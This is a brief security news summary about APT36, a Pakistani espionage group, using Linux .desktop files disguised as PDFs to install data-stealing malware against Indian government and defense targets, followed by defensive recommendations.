APT36 hackers abuse Linux .desktop files to install malware in new attacks
What’s new: APT36, a Pakistani cyber espionage group, is exploiting Linux .desktop files to deploy malware in attacks targeting Indian government and defense entities. The attacks, which began on August 1, 2025, involve phishing emails containing malicious .desktop files disguised as PDF documents. These files execute hidden commands to download and run a Go-based ELF executable for data exfiltration and persistent access.
Who’s affected
Government and defense organizations in India are the primary targets of these attacks, which aim to establish persistent espionage access.
What to do
- Educate users about the risks of opening unexpected email attachments, especially those disguised as common file types.
- Implement security measures to monitor and restrict the execution of .desktop files on Linux systems.
- Regularly update and patch systems to mitigate vulnerabilities that could be exploited by such malware.
- Consider using endpoint detection and response (EDR) solutions that can identify and respond to unusual file behavior.
